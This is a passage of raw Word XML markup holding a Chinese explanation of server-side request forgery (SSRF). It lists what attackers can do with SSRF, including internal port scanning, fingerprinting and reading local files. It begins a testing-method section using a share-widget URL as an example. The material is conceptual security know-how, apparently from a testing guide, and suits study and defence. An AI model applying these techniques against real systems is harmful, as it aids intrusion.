          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端请求伪造攻击（</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server-side Request Forgery</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很多</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用都提供了从其他的服务器上获取数据的功能。使用用户指定的</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用可以获取图片，下载文</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>件，读取文件内容等。这个功能如果被恶意使用，可以利用存在缺陷的</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用作为代理攻击远程和本地的服务器。这种形式的攻击称为服务端请求伪造攻击（</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server-side Request Forgery</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。一般情况下，</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSRF</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击的目标是从外网无法访问的内部系统</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。（</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">.SSRF </w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>形成的原因大都是由于</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。比如从指定</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址获取网页文本内容，加载指定地址的图片，下载等等。攻击者利用</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssrf</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以实现的攻击主要有</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C60FF7" w14:textId="1C00BBED" w:rsidR="00CC545C" w:rsidRPr="009910AE" w:rsidRDefault="00CC545C" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>banner</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195F2244" w14:textId="6336261F" w:rsidR="00CC545C" w:rsidRPr="009910AE" w:rsidRDefault="00CC545C" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击运行在内网或本地的应用程序（比如溢出）</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B252A2" w14:textId="2F6167DA" w:rsidR="00CC545C" w:rsidRPr="009910AE" w:rsidRDefault="00CC545C" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对内网</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用进行指纹识别，通过访问默认文件实现</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6118F913" w14:textId="46D9E1F3" w:rsidR="00CC545C" w:rsidRPr="009910AE" w:rsidRDefault="00CC545C" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击内外网的</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用，主要是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数就可以实现的攻击（比如</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqli</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A4C6A" w14:textId="2FBDF342" w:rsidR="009145B3" w:rsidRPr="009910AE" w:rsidRDefault="00CC545C" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议读取本地文件等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547968B5" w14:textId="77777777" w:rsidR="00D70FD0" w:rsidRPr="009910AE" w:rsidRDefault="009145B3" w:rsidP="009910AE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00D70FD0" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidR="00D70FD0" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidR="00D70FD0" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能上寻找：我们从上面的概述可以看出，</w:t>
      </w:r>
      <w:r w:rsidR="00D70FD0" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidR="00D70FD0" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是由于服务端获取其他服务器的相关信息的功能中形成的，因此我们大可以列举几种在</w:t>
      </w:r>
      <w:r w:rsidR="00D70FD0" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">web </w:t>
      </w:r>
      <w:r w:rsidR="00D70FD0" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用中常见的从服务端获取其他服务器信息的的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B2D419" w14:textId="197ECFBB" w:rsidR="00D70FD0" w:rsidRPr="009910AE" w:rsidRDefault="00D70FD0" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过分享功能：通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址分享网页内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777FB5F2" w14:textId="77777777" w:rsidR="00D70FD0" w:rsidRPr="009910AE" w:rsidRDefault="00D70FD0" w:rsidP="009910AE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>早期分享应用中，为了更好的提供用户体验，</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用在分享功能中，通常会获取目标</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址网页内容中的</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;tilte&gt;&lt;/title&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签或者</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;meta name="description" content=</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“”</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签中</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文本内容作为显示以提供更好的用户体验。例如人人网分享功能中：</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://widget.renren.com/*****?resourceUrl=https://www.</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nsfocus</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7973F035" w14:textId="77777777" w:rsidR="00D70FD0" w:rsidRPr="009910AE" w:rsidRDefault="00D70FD0" w:rsidP="009910AE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过目标</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址获取了</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签和相关文本内容。而如果在此功能中没有对目标地址的</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>范围做过滤与限制则就存在着</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
